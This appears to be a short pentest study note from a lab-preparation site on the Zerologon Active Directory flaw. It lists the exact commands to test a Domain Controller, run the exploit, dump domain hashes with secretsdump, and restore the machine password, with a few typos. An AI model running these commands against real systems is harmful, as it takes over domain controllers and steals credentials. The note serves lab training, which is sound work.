// notes/ Active Directory
🏛️
Critical Active Directory CVEs Zerologon
The Zerologon vulnerability allows for attackers to manipulate authentication mechanisms in Microsoft’s Active Directory Netlogon Remote Protocol and compromise the Domain Control…
#active directory#adot8
source · oscp.adot8.com · active-directory/critical-active-directory-cves_zerologon ↗Zerologon
Overview
The Zerologon vulnerability allows for attackers to manipulate authentication mechanisms in Microsoft’s Active Directory Netlogon Remote Protocol and compromise the Domain Controller.
We are essentially the Domain Controller authentication to null so we can authenticate without a password.
{% hint style="danger" %} This vulnerability can BREAK the Domain Controller so exploiting it in a real engagement shouldn't be done {% endhint %}
Now here's how to do it :D
Zerologon Attack
First check if the Domain Controller is vulnerable with this script
bash
$./zerologon_tester.py PNPT-DC 192.168.1.129Exploit the vulnerability with this script then dump hashes
bash
$python3 cve-2020-1472-exploit.py PNPT-DC 192.168.1.129$imapcket-secretsdump -just-dc PNPT/PNPT-DC\$@192.168.1.129Restore Domain Controller back to normal
bash
$python3 restorepassword.py PNPT/PNPT-DC@PNPT-DC -target-ip 192.168.1.129 -hexpass XXX